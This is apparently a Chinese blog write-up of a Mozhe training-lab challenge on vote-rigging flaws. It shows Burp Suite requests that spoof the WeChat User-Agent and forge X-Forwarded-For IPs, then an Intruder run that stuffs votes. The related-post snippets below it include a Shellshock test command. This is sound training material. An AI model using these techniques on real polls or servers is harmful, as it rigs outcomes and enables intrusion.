mozhe 投票常见漏洞分析溯源

于 2022-06-10 12:11:43 发布
阅读量1k 收藏 3
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ted_guangda/article/details/125218706
版权

看了小迪安全,做了mozhe的投票常见漏洞分析溯源,做个题解。

以下是题目界面。

看提示。

User-Agent通俗说客户浏览器名称。

举个例子。

微信在 Android 下的 User Agent

Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/WIFI

bilibili在Firefox下的 User Agent

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0

X-Forwarded-for(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。

进入题目页面

 投个票试试

请用微信试试

 拉到微信里访问,在微信里投票成功。

抓包查看

POST /wx_vote_do.php HTTP/1.1
Host: 124.70.71.251:42367
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 4
Origin: http://124.70.71.251:42367
Connection: close
Referer: http://124.70.71.251:42367/wx_vote.php

id=6

看到User-Agent

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0

 再回想前面关于微信在 Android 下的 User Agent,是不是将User Agent更改成微信在Android 下的User Agent就可以投票了?

试一试。

 发送。

刚刚在微信已经投过一次,所以是成功了。

根据提示我们想到这是对IP进行验证的投票方式。

所以用X-Forwarder-for进行IP更改 

POST /wx_vote_do.php HTTP/1.1
Host: 124.70.71.251:42367
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/WIFI Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-Forwarded-for: 10.10.10.10
Content-Length: 4
Origin: http://124.70.71.251:42367
Connection: close
Referer: http://124.70.71.251:42367/wx_vote.php

id=6

发送成功,但是还有个问题。

题目要求是投到第一名,但是现在每个IP只能投票一次,怎么办呢?

很容易就想到用burpsuite的Intruder。

先把攻击目标确定。

 

再设定变量,攻击模式选择自定义的Cluster bomb。

 

在payloads中设置变量。

开始。

看到状态码是200就松了一口气,成功了。

 回到题目页面刷新。

 获得第一名了。

ca12uh
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害**:攻击者可以通过RCE漏洞执行任意命令,获取敏感信息,篡改数据,甚至完全控制服务器。 5. **修复**:最佳...
墨者网络安全——投票常见漏洞分析溯源
weixin_53980169的博客
07-22 1555
墨者网络安全投票常见漏洞分析溯源
墨者学院-入门级-投票常见漏洞分析溯源-小白必看(超详细)
kitiu666的博客
08-06 1848
2020年8月6日 ,第三次网络安全试验。 通过拦截响应包,对服务器网站进行攻击。 准备需要: 1.window电脑 2.burpsuite(bp)抓包软件 1.进入靶场,任务是需要我们投票,把a2019的票数成为第一,就是所谓的刷票,完成后,就会获得key。 2.然后开启代理,进入bp打开响应包拦截,当我们点击投票按钮,bp就会拦截到一个响应包。 把响应包的内容复制粘贴到,并修改User-Agent的头数据,然后在末尾加上加上一个扩展头,然后分别选中0和1,按右边的“Add §”按钮。 代码: Mo
墨者学院—网络安全篇3
博客
09-17 1518
文章目录投票常见漏洞分析溯源标题 投票常见漏洞分析溯源 背景介绍 小墨在微信群里面收到一个关于“家乡美”最美乡村评选微信投票,小墨想让自己的家乡成为第一名 实训目标 1、User-Agent的理解 2、X-Forwarded-for的理解 3、使用BurpSuite工具修改内容 解题方向 根据页面提示,进行投票测试 解题步骤 首先开启靶场环境 点击进入微信投票,根据提示 我们需要把a2019的票数刷到第一名 提示要用微信打开 我们使用浏览器信息伪造 标题 ...
投票常见漏洞分析
m0_51407102的博客
06-03 1009
投票常见漏洞分析溯源 文章目录前言一、User-Agent的理解二、X-Forwarded-For的理解1.什么是X-Forwarded-For2.X-Forwarded-For可以用来干什么3.brup的爆破模式三.开始靶场练习这是个微信投票,某某要自己的家乡成为第一名二、开始操作搞起来1.打开网站首页收到提示页面提示要用微信打开,然而奈何实力不允许没有微信,只能想办法了。这个时候想到了User-Agent,那我把这个改成微信的User-Agent不就可以投票了嘛2.先百度一个微信的User-Agent
墨者学院-投票常见漏洞分析溯源
Ruoten的博客
01-01 3388
1.进入靶场,任务要求是需要我们投票,把a2019的票数成为第一,就是所谓的刷票,完成后,就会获得key值 2.然后打开BurpSuite打开响应包拦截,当我们点击投票按钮,BurpSuite就会拦截到一个响应包 3.点击鼠标右键点击"send to Intruder",然后把响应包的内容进行修改,修改User-Agent的头数据为"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom.
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
Mozhe的案例中,提权过程涉及发现和利用内核漏洞。攻击者首先连接到系统,然后获取可利用的内核漏洞信息,下载或上传EXP(exploit),编译EXP,并赋予执行权限。例如,`gcc 45010.c -o 45010`用于编译C源代码,...
Web应用安全:Burpsuite重放模块介绍.pptx
06-20
它允许安全研究人员多次重放请求响应,并在修改请求后分析服务器的响应,以检测潜在的安全漏洞。 **重放模块的介绍** Burp Repeater允许用户捕获HTTP请求,对其进行编辑,然后重新发送,以便观察不同参数变化如何...
第06天:基础入门-加密编码算法1
08-03
在URL加密地址的漏洞测试中,可能涉及到AES与Base64的结合,以及自定义的加密模式,如CBC模式,解密时需分析加密参数,如128位密钥、偏移量等。 学习这些加密编码算法及其应用,可以借助一些在线工具,如: - ...
最新的墨者有隔离技术
10-28
压缩包内的“mozhe.exe”很可能就是包含该隔离技术的软件执行文件,用户下载后需要安装运行,以实现对密码和其他敏感数据的保护。而“说明_Readme.html”则可能是软件的使用指南或用户手册,其中会详细解释如何安装...
微信朋友圈投票活动的“刷票”案例分析
lhorse003的博客
05-15 9889
https://github.com/debugtalk/VoteRobot 现阶段,在微信朋友圈举办的投票活动层出不穷,相信已经有不少同学对此不胜其烦,因为总会时不时地冒出个人(亲戚、朋友、or whatever)来请你帮TA投票。 本文倒没有打算从道德或者情感层面来探讨这个问题,我所感兴趣的是,当前大多数投票活动其实都是存在明显漏洞的,通过简单的技术手段就可以实现“刷票”。
投票常见漏洞分析溯源
asd158923328的博客
08-20 880
靶场地址: https://www.mozhe.cn/bug/detail/WTNpdGxUS3l4dG9uMFF6ZEs3OEJCdz09bW96aGUmozhe 根据题意 进入环境 使用burp suite构造User-Agent,X-Forwarded-for,attack刷新获取key ...
墨者学院 - 投票常见漏洞分析溯源
多崎巡礼的博客
07-31 1698
首先用burp抓包,然后把包发送到intruder因为提示用微信投票,所以把User-Agent:改成 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 MicroMessenger/6.0NetType/2G 然后添加X-Forwarded-For:1...
墨者 - 投票常见漏洞分析溯源
吃肉唐僧的博客
07-18 1308
正常访问,发现需要微信端才可登录 所以伪造微信请求头和ip地址即可 用bp抓包 User-Agent:改成 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 MicroMessenger/6.0NetType/2G X-Forwarded-For:...
0x10.投票常见漏洞分析溯源
qq_31679787的博客
09-23 149
测试投票,发现提示使用微信打开,猜测需要修改user-agent头; 点击投票并抓包,修改user-agent头为微信格式并添加x-forwarded-for; 通过爆破x-forwarded-for的地址,增加投票数,得到key; ...
墨者学院 - CMS系统漏洞分析溯源(第5题)
多崎巡礼的博客
10-29 1599
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?>   判断如果没有admin_na...
墨者学院--投票常见漏洞分析溯源
weixin_44382289的博客
09-23 634
1.打开页面,是一个投票页面,点击所要投票的,提示需要登录微信,根据题意我使用burp抓request包; 2.根据题意,需要伪造user-agent:mozilla/5.0 (windows nt 10.0; wow64) applewebkit/537.36 (khtml, like gecko) chrome/57.0.2987.98 micromessenger/6.0nettype/2...
Bash漏洞分析溯源
Ju0se
11-24 439
漏洞编号: CVE-2014-6271 漏洞名称: Linux Bash远程可执行漏洞 漏洞影响范围: 所有安装GNU bash 版本小于或者等于4.3的Linux操作系统 漏洞检测: 使用以下命令检测是否存在此漏洞: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果返回显示有“vulnera...
墨者sql注入mysql
最新发布
09-29
墨者在练习SQL手工注入时,发现PHP代码对客户端提交的参数未做任何过滤,可以利用这个漏洞进行注入。他可以通过两种方法来进行注入。 第一种方法是手工注入。墨者可以通过了解SQL注入原理和MySQL的数据结构,掌握...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值